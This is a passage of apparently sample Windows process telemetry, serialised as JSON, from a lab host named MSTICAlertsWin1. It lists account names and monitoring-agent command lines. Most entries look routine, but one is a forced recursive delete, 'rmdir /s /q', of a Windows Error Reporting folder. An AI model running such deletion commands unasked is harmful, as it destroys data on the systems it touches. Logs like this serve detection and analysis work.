ROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"NaN\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\unlodctr.exe\\\" \\\"cps etw data source\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\TEMP\\\\y2cnqfwv\\\\y2cnqfwv.cmdline\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \\\"/OUT:C:\\\\Windows\\\\TEMP\\\\RES11C7.tmp\\\" \\\"c:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\889\\\\CSC59E7803C44264BB494469645A4F791C0.TMP\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\lodctr.exe\\\" \\\"C:\\\\Windows\\\\TEMP\\\\tmp110B.tmp\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c rmdir /s /q C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c WerFault.exe -k -q\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"WerFault.exe -k -q\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.vbs\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.vbs\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\\\" -baseline \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\922\\\\BaselineWindowsServer2016.xml\\\" -out \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\BaselineRulesetAll.mof\\\" -err \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\xmlToMoferrors.txt\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\\\" Get \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\BaselineRulesetAll.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /cfg \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\Configuration\\\\AzureSecurityPack\\\\secedit.inf\\\"\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /mergedpolicy /cfg \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\Configuration\\\\AzureSecurityPack\\\\secedit.inf\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\\\" -execPackage \\\"ANYPATH\\\" -w \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\410045\\\" -trace Off -smtrace Warning -discoverysettings Server:ServerName=MSTICAlertsWin1 -managementgroupid -managementgroupname \\\"\\\" -assessmentId a1d21da7-586b-4b73-95cb-2405d2a54f5f -computername MSTICAlertsWin1 -assessmentname Web -headers False -maxdcs 300 -baselinerulesfilepath \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\916\\\\WebBaselineRules.xml\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft 